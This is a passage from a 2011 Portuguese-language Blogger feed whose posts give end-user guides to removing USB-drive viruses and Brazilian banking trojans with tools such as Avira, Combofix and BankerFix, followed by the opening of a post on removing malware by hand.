&lt;a href="" style="outline-color: initial; outline-style: none; outline-width: initial;"&gt;Avira&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Atualmente eu utilizo o Avira. É gratuito, leve, bom e não tenho muito do que reclamar.&lt;br /&gt;
Até hoje não deixou passar nenhum vírus de pendrive e outros para o meu PC.&lt;br /&gt;
Portanto recomendo ele, o link para download é&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.baixaki.com.br/download/avira-antivir-personal-edition-classic.htm" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.baixaki.com.br/download/avira-antivir-personal-edition-classic.htm&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;3º Passo – Depois do antivírus entrar em ação, restaurar o pendrive e o computador&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Se você utiliza um desses antivírus acima, então ao colocar seu pendrive infectado no computador ele irá acusar um vírus e automaticamente limpará o pendrive.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Porém isso não garante que seu computador está mesmo livre do vírus.&lt;br /&gt;
Quando escrevi as primeiras versões desse guia eu indiquei vários programas para tirar esses vírus.&lt;br /&gt;
Hoje vou recomendar apenas um que irá fazer a faxina geral no computador.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;4º Passo – Combofix&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Primeiro faça o download do Combofix aqui&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.baixaki.com.br/download/combofix.htm" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.baixaki.com.br/download/combofix.htm&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Depois de fazer o download execute ele, como as instruções são em português não tem segredo, só lembre de não fazer nada enquanto ele é executado.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Bom depois de executar o Combofix, tanto seu pendrive como o computador devem estar limpos.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Mas ATENÇÃO, qualquer problema que fuja disso, ou com esses passos não seja possível remover, bom ai é um caso bem grave mesmo, e recomendo buscar informação específica.&lt;br /&gt;
Um bom lugar é o fórum&amp;nbsp;&lt;a href="http://www.linhadefensiva.org/forum/" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;Linha Defensiva&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Sinceramente espero ter ajudado vocês a remover esses vírus e salvar o que vocês tem no pendrive.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-2209275887421821368?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QY0Z0hKj4WtbPiQxUfa3Ur6zSjw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QY0Z0hKj4WtbPiQxUfa3Ur6zSjw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QY0Z0hKj4WtbPiQxUfa3Ur6zSjw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QY0Z0hKj4WtbPiQxUfa3Ur6zSjw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/exhUKAonO3Q" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/2209275887421821368/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/removendo-virus-de-pen-driver.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2209275887421821368?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2209275887421821368?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/exhUKAonO3Q/removendo-virus-de-pen-driver.html" title="Removendo Virus de Pen Driver" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/removendo-virus-de-pen-driver.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eCp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-3481991370408805364</id><published>2011-03-23T05:47:00.000-07:00</published><updated>2011-03-24T06:17:23.820-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.820-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Como remover virus de MSN e Orkut com o BankerFix.</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Banker é um tipo de cavalo de tróia que é especifico para roubar senhas e busca sempre senhas de banco, paypal, orkut e MSN.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O site brasileiro responsável pela limpeza dos Bankers é o site Linha Defensiva:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.linhadefensiva.org/bankerfix/" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.linhadefensiva.org/bankerfix/&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Isso acontece pelo próprio Brasil, pois os vírus são comprados por brasileiros que querem roubar aqui no Brasil mesmo.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Eu vou colocar abaixo a minha versão de como remover esses vírus, mas fica ao seu critério seguir por aqui ou pelo site Linha Defensiva.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Passo 1 - O BankerFix&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O BankerFix é o programa específico para remover Banker.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Baixe aqui:&amp;nbsp;&lt;a href="http://www.linhadefensiva.org/dl/bankerfix" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.linhadefensiva.org/dl/bankerfix&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Dê preferência para salvar no seu DESKTOP.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="293" src="http://img8.imageshack.us/img8/1487/zrclip003p38c9d563.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; display: inline; height: 293px; width: 420px;" width="420" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Passo 2 - Restauração de Sistema&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Outro detalhe importante é sobre a Restauração do Sistema que deve estar desativada para garantir que após a reinicialização o vírus não retorne.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Meu Computador&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="66" src="http://img8.imageshack.us/img8/8091/zrclip004p678e37c2.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="103" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Botão Direito&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="384" src="http://img8.imageshack.us/img8/452/zrclip005n11ee460a.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="240" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Propriedades e Restauração de Sistema&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="485" src="http://img8.imageshack.us/img8/751/zrclip006p7510055.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="421" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;E Marque: Desativar restauração do sistema em todas as unidades.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Após o processo você poderá reabilitar, mas eu não recomendo.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Passo 3 - Executando o BankerFix&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="75" src="http://img8.imageshack.us/img8/3092/zrclip007p46fb4518.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="89" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Duplo clique&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="135" src="http://img8.imageshack.us/img8/7073/zrclip008n1c020f20.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="307" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Sim&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="82" src="http://img8.imageshack.us/img8/3953/zrclip009n53781733.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; display: inline; height: 82px; width: 420px;" width="420" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Ok&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Nesse momento várias janelas em DOS minimizadas irão aparecer e sumir e isso é normal.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="116" src="http://img8.imageshack.us/img8/4209/zrclip010n45793db7.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="229" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="215" src="http://img8.imageshack.us/img8/1328/zrclip011p35ce7499.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; display: inline; height: 215px; width: 420px;" width="420" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Nesse momento desative o seu antivírus e o seu Internet Explorer será fechado, ou seja, para continuar o tutorial baixe a versão PDF no final desse post para poder acompanhar.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="215" src="http://img8.imageshack.us/img8/7927/zrclip012p2f566d5c.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; display: inline; height: 215px; width: 420px;" width="420" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="215" src="http://img8.imageshack.us/img8/5922/zrclip013na415430.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; display: inline; height: 215px; width: 420px;" width="420" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Passo 4 - Encontrou Problemas&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Se o BankerFix mostrou que tem vírus e removeu isso é muito bom e se ele pedir para reiniciar faça imediatamente.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Se algum arquivo não pode ser removido o conselho é entrar em modo de segurança (aperte F8 ao iniciar seu Windows) e passe o BankerFix novamente.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Passo 5 - Relatório&lt;/strong&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O BankerFix gera um relatório no final do rastreamento e ele fica armazenado na pasta:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;C:\LinhaDefensiva ou no drive que você salvou&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O nome do arquivo é:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;relatorio.txt&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"&gt;&lt;img height="121" src="http://img8.imageshack.us/img8/5102/zrclip014p30fe64ef.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; display: inline; height: 121px; width: 420px;" width="420" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Após o BankerFix eu também aconselho o ComboFix:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://professorwellingtontelles.blogspot.com/2009/07/combofix-tutorial.html" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://professorwellingtontelles.blogspot.com/2009/07/combofix-tutorial.html&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-3481991370408805364?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/vNcH-_wHUmh301foZRqhPKALFZE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vNcH-_wHUmh301foZRqhPKALFZE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/vNcH-_wHUmh301foZRqhPKALFZE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vNcH-_wHUmh301foZRqhPKALFZE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/xqGHMi8f5n4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/3481991370408805364/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/como-remover-virus-de-msn-e-orkut-com-o.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3481991370408805364?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3481991370408805364?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/xqGHMi8f5n4/como-remover-virus-de-msn-e-orkut-com-o.html" title="Como remover virus de MSN e Orkut com o BankerFix." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/como-remover-virus-de-msn-e-orkut-com-o.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eCp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-4039295739309884801</id><published>2011-03-23T05:35:00.001-07:00</published><updated>2011-03-24T06:17:23.820-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.820-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="." /><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Removendo qualquer tipo de vírus na "raça"</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Tutorial Antigo, mas muito informativo&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;A falta de informação das pessoas aliada à falta de segurança do Windows traz sérios riscos, não é de hoje. Um programa com código malicioso executado no computador pode fazer coisas das mais terríveis. Tudo bem, isso já é do conhecimento de todos, mas de qualquer forma as pessoas precisam usar seus computadores, e estes devem estar livres de pragas.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Use antivírus. Use antispyware. Use firewall. Até que ponto isso é verdadeiro? Muita gente se surpreende comigo quando digo: eu não uso antivírus! Recuso-me até a morte (ou, quem sabe, até que um vírus me prove o contrário :). E não recomendo, sinceramente. Tudo fica mais lento. Mesmo em PCs atuais, sou meio contra a idéia de haver um programa tendo que monitorar todos os dados no meu computador em tempo real, em busca de um código malicioso. Isso é coisa para sistemas operacionais incompetentes.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O que não vem a ser totalmente o caso do Windows, pois quem está diante do sistema é uma pessoa. É a pessoa que deveria saber o que abrir, o que fazer e como agir. Ninguém nasce sabendo, então trago aqui algumas noções importantes para detectar e eliminar boa parte dos malwares que infectam o Windows. Além, é claro, de tentar conscientizar um pouco sobre medidas de segurança que boa parte das pessoas sabem - ou pelo menos já ouviram falar - mas não se dão ao trabalho de cumpri-las.&lt;/div&gt;&lt;h3 style="color: #e30140; font-family: Tahoma, Arial, sans-serif; font-size: 11px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 25px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;Fui infectado! E agora?&lt;/h3&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esses dias entrou um malware no computador de uma amiga, daqueles que ficam enviando mensagens pelo MSN. Eles detectam a janela de conversa aberta e enviam comandos à mesma, fazendo com que um texto seja enviado para a pessoa com a qual a outra esteja conversando - como se tivesse sido digitada pela pessoa. Minha amiga estava com o nick "Tá enviando vírus, não clique!". E logo que abríamos a conversa normalmente vinham lá alguns dizeres "Olha as fotos que eu tirei com não sei quem, veja aqui..." seguido de um endereço de um site suspeito. Claro, clicando, mais uma pessoa seria infectada. Além disso, vai saber o que esse programinha não fazia nos bastidores. Hoje em dia roubar dados é a principal idéia dos malwares: senhas, contatos, tudo o que foi digitado. Foi-se o tempo em que vírus destruía para se exibir.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Numa seção de "exorcismo" virtual, ajudei essa amiga pelo MSN mesmo, de uma forma simples. Ela estava passando desesperada o AVG e um antispyware, e nada de eles detectarem a praga. Então lá fui eu. Pedi para ela abrir o gerenciador de tarefas do Windows na aba "Processos", e me enviar uma imagem da tela. Com base nisso eu chutaria alguns processos e mandaria ela fechar. E isso foi feito. O malware foi fechado. A segunda parte foi um pouco mais complicada para ela, mas nada tão doloroso: abrir o MSConfig e desativar a inicialização do maldito (eu procuraria diretamente no registro, mas ela iria se perder). Depois de reiniciado o PC, esse pelo menos já era. AVG 0 x 1 Eu!&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 